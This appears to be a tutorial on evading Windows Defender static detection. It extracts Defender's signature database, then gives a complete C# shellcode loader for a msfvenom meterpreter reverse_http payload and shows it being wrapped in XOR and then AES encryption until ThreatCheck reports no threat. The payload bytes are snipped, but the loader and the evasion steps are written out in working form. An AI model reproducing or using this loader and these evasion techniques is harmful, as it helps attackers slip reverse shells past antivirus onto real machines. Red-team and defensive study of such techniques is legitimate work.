Static Analysis
Defender detection
PS C:\Tools\ExpandDefenderSig> Import-Module C:\Tools\ExpandDefenderSig\ExpandDefenderSig.ps1
PS C:\Tools\ExpandDefenderSig> ls "C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{50326593-AC5A-4EB5-A3F0-047A75D1470C}\mpavbase.vdm" | Expand-DefenderAVSignatureDB -OutputFileName mpavbase.raw
Directory: C:\Tools\ExpandDefenderSig
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/9/2024 12:50 PM 79092299 mpavbase.raw
PS C:\Tools\ExpandDefenderSig> C:\Tools\Strings\strings64.exe .\mpavbase.raw | Select-String -Pattern "WNcry@2ol7"
WNcry@2ol7d
WNcry@2ol7
Bypass
using System;
using System.Linq;
using System.Runtime.InteropServices;
namespace NotMalware
{
internal class Program
{
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
static void Main(string[] args)
{
// Shellcode (msfvenom -p windows/x64/meterpreter/reverse_http LHOST=... LPORT=... -f csharp)
byte[] buf = new byte[] {<SNIP>};
// Allocate RW space for shellcode
IntPtr lpStartAddress = VirtualAlloc(IntPtr.Zero, (UInt32)buf.Length, 0x1000, 0x04);
// Copy shellcode into allocated space
Marshal.Copy(buf, 0, lpStartAddress, buf.Length);
// Make shellcode in memory executable
UInt32 lpflOldProtect;
VirtualProtect(lpStartAddress, (UInt32)buf.Length, 0x20, out lpflOldProtect);
// Execute the shellcode in a new thread
UInt32 lpThreadId = 0;
IntPtr hThread = CreateThread(0, 0, lpStartAddress, IntPtr.Zero, 0, ref lpThreadId);
// Wait until the shellcode is done executing
WaitForSingleObject(hThread, 0xffffffff);
}
}
}
Note: When creating a new project, make sure to select Console App (.NET Framework)
, and when compiling make sure to target x64
in Release
mode.
XOR Encryption
PS C:\Tools\NotMalware\NotMalware\bin\x64\Release> C:\Tools\ThreatCheck-master\ThreatCheck\ThreatCheck\bin\x64\Release\ThreatCheck.exe -f .\NotMalware.exe
XOR
our shellcode with the value 0x5C
(make sure to get rid of new lines, as this breaks the recipe).
Replace the shellcode in the program with the output, and then add a short loop which XORs
each byte with 0x5C
just before writing the shellcode to memory
<SNIP>
// XOR'd shellcode (msfvenom -p windows/x64/meterpreter/reverse_http LHOST=... LPORT=... -f csharp)
byte[] buf = new byte[] { <SNIP> }
// Allocate RW space for shellcode
<SNIP>
// Decrypt shellcode
int i = 0;
while (i < buf.Length)
{
buf[i] = (byte)(buf[i] ^ 0x5c);
i++;
}
// Copy shellcode into allocated space
<SNIP>
Still detected:
AES Encryption
Modified code
<SNIP>
using System.Security.Cryptography;
namespace NotMalware
{
internal class Program
{
<SNIP>
static void Main(string[] args)
{
// Shellcode (msfvenom -p windows/x64/meterpreter/reverse_http LHOST=... LPORT=... -f csharp)
string bufEnc = "<SNIP>";
// Decrypt shellcode
Aes aes = Aes.Create();
byte[] key = new byte[16] { 0x1f, 0x76, 0x8b, 0xd5, 0x7c, 0xbf, 0x02, 0x1b, 0x25, 0x1d, 0xeb, 0x07, 0x91, 0xd8, 0xc1, 0x97 };
byte[] iv = new byte[16] { 0xee, 0x7d, 0x63, 0x93, 0x6a, 0xc1, 0xf2, 0x86, 0xd8, 0xe4, 0xc5, 0xca, 0x82, 0xdf, 0xa5, 0xe2 };
ICryptoTransform decryptor = aes.CreateDecryptor(key, iv);
byte[] buf;
using (var msDecrypt = new System.IO.MemoryStream(Convert.FromBase64String(bufEnc)))
{
using (var csDecrypt = new CryptoStream(msDecrypt, decryptor, CryptoStreamMode.Read))
{
using (var msPlain = new System.IO.MemoryStream())
{
csDecrypt.CopyTo(msPlain);
buf = msPlain.ToArray();
}
}
}
// Allocate RW space for shellcode
<SNIP>
"No threat found!"
But .... Behavorial detection
Last updated